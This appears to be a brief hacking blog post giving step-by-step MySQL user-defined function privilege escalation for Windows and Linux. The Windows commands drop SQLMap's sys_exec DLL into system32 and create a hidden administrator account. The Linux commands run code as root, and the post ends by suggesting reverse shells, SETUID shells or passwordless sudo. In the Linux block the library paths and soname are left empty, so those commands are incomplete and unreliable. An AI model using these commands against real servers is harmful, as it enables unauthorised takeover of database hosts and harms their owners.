MySql User-Defined Function (UDF) Privilege Escalation (Windows & Linux)

We will get in to making our own functions in later posts but for now the UDF compiled shared objects from SQLMap are great.

Windows Escalation

mysql> USE mysql;
mysql> CREATE TABLE pwn(line blob);
mysql> INSERT INTO pwn values(load_file('C://xampplite//htdocs//mail//lib_mysqludf_sys.dll'));
mysql> SELECT * FROM mysql.pwn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll';
mysql> CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll';
mysql> SELECT sys_exec("net user pwned pwn123! /add");
mysql> SELECT sys_exec("net localgroup Administrators pwned /add");

Linux Escalation

mysql> use mysql;
mysql> create table pwn(line blob);
mysql> insert into pwn values(load_file('/home/npn/'));
mysql> select * from pwn into dumpfile '/usr/lib/';
mysql> create function sys_exec returns integer soname '';
mysql> select sys_exec('id > /tmp/out; chown npn.npn /tmp/out');

Verify Command Execution

user@box:/$ cat /tmp/out uid=0(root) gid=0(root) groups=0(root)

You can now execute code as root, what more do you need? You can allow SUDO all no password or create SETUID shell program with c, execute a reverse shell etc, whatever you want; be creative.